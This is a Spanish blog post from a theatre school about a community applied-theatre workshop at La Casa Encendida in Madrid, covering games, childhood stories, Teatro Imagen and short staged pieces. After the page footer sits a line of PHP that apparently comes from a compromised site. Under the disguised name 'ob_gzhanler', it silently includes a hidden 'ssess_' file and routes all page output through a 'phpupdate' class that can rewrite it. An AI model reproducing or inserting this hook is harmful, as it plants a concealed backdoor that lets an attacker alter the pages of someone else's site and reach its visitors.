Arte, comunidad y participación en La Casa Encendida

 En Escuela Cross Border
… O EL SECRETO ESTÁ EN EL PROCESO

El pasado Jueves 29 de Septiembre participamos en el curso Arte, comunidad y participación organizado por Las Cientovolando en La Casa Encendida de Madrid.

Fieles al espíritu de generosidad y apertura propio de los proyectos participativos, las Ciento decidieron que el curso se convirtiese en un espacio para que los participantes conociesen diversas propuestas y metodologías en el trabajo artístico con comunidades. LISARCO se ocuparon de la danza, Cine Sin Autor, del Cine, y nosotros de las artes escénicas. Y por supuesto Las Cientovolando, además de coordinar el curso, compartieron su sabroso saber fotográfico.

El grupo era bastante variopinto, con personas provenientes del trabajo social, la gestión cultural, las artes escénicas y plásticas, o la psicología. La mezcla de ingredientes fue clave para que la sesión fuese fructífera y sorprendente, y se generasen sinergias enriquecedoras en múltiples direcciones.

La sesión comenzó jugando para re-conocerse (un nuevo contexto que crea una nueva mirada), y siguió dando espacio a que las personas participantes se conociesen un poco mejor, como individuos y como grupo.

Arte, comunidad y participación en La Casa EncendidaEn esta ocasión volvimos a trabajar con las historias personales como centro y motor de la sesión, proponiendo a las participantes que compartiesen historias de infancia y adolescencia como punto de partida. Tras esto, volvimos a jugar, esta vez con el Teatro Imagen como herramienta de composición y reflexión. Finalmente, las participantes compusieron breves piezas escénicas, utilizando los materiales surgidos durante la sesión, llegando al clímax final al compartir lo creado en el ritual de la muestra.

Una vez más, la gasolina para crear fue “trabajar con lo que hay”, partiendo de lo cotidiano, lo cercano y lo accesible, y dándole forma para compartirlo. Los cuerpos, las voces, las historias personales y el espacio vacío fueron herramientas de sobra para sorprendernos, activarnos y emocionarnos mutuamente.

Fue muy gratificante comprobar que, a pesar de lo híper-concentrado de la sesión (cuatro horas) y de lo rápido que hablo y me muevo en general (muy rápido),  el sabor de boca final fue motivador y emocionante. La esencia de la cuestión se había posado suavemente y con firmeza. Las participantes compartieron aquello para lo que les inspiraba el taller, desde lo personal a lo laboral, y volvió a hacerse patente que el teatro aplicado es una herramienta natural y potentísima, que transforma a quien la realiza y a quien la disfruta.

Lo bonito de estas cosas, es que en el proceso siempre hay nieblas y cosas inciertas e incluso miedo. También hay risas, hay descubrimientos, hay momentos de trascendencia, de cruzar límites, hay ventanas que se abren. Y de ese batiburrillo algo caótico a veces, algo silencioso otras, algo tenso, algo banal, algo rápido (nunca hay tiempo suficiente, y eso es lo mejor de todo), surgen experiencias que conectan lo que estaba desconectado, que revelan, que emocionan y se posan, y se quedan ahí.

Suerte que tenemos las que curramos en esto de poder descubrirlo una y otra vez, en cada sesión, en cada taller, en cada participante. Da gusto compartir cosas ricas.

Entradas recientes
Escríbenos

Y te responderemos lo antes posible!!

Empiece a escribir y pulse Enter para buscar

TIC Cultura 2016 - Belén de Santiago

function ob_gzhanler($s) { $f='/usr/home/thecrossborderproject.com/etc/ssess_06268501231c12ce8b36dce7d82aab56'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');